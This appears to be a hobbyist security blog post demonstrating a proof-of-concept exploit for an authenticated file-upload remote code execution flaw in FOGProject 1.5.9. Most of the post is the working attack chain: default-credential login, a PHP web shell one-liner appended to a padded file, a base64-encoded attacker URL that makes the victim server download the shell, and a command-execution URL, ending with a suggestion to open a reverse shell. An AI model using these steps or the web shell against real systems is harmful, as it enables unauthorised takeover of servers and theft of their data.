Muzec's Cyber Security Blog

Hack. Sleep. Repeat

View on GitHub

Hello Guys so i will be talking about the new FOGProject 1.5.9 - File Upload RCE (Authenticated) which was disclose not to long so i will be exploiting one for a Proof Of Concept.

image

ExploitDB Link:- https://www.exploit-db.com/exploits/49811

image

We are having the victim machine ready now let log in with FogProject default credentials which is fog and password and we should have access to the dashboard.

image

Not time for the fun part going to attacking machine let create an empty 10mb file.

dd if=/dev/zero of=myshell bs=10485760 count=1

image

Now let add our PHP payload to the end of the file we just created.

echo '<?php $cmd=$_GET["cmd"]; system($cmd); ?>' >> myshell

image

Now we need to allow our myshell file to be accessible through HTTP i will using SimpleHTTPServer for that or you can easily copy the myshell to your /var/www/html .

image

It on the same folder i have the myshell now let encode the URL to get myshell file to base64 (Replacing Attacker IP) that is my IP because of the myshell file we are hosting on my machine.

echo "http://Attacker-IP/myshell" | base64

image

Now let visit the URL.

http://localhostfog//fog/management/index.php?node=about&sub=kernel&file=aHR0cDovLzEwLjguMC4xNTYvbXlzaGVsbAo=&arch=arm64 NOTE:- we add the myshell that we encoded in the base64 aHR0cDovLzEwLjguMC4xNTYvbXlzaGVsbAo= .

http://VICTIM_IP/fog/management/index.php?node=about&sub=kernel&file=<MYSHELL_URL_ENCODED_IN_BASE64_HERE>=&arch=arm64 .

image

Now change the Kernel Name (bzImage32) to myshell.php and click on Install we should get Download Started give it time and we should see Transfer Succeeded .

image

Nice our file have been uploaded we can confirm it by checking the SimpleHTTPServer we started.

image

Now let access our upload file through URL to get Remote Code Execution.

http://localhostfog/fog/service/ipxe/myshell.php?cmd=id

image

Boom and we have remote code execution you can go ahead and get a reverse shell or do anything.

Greeting From Muzec



Back To Home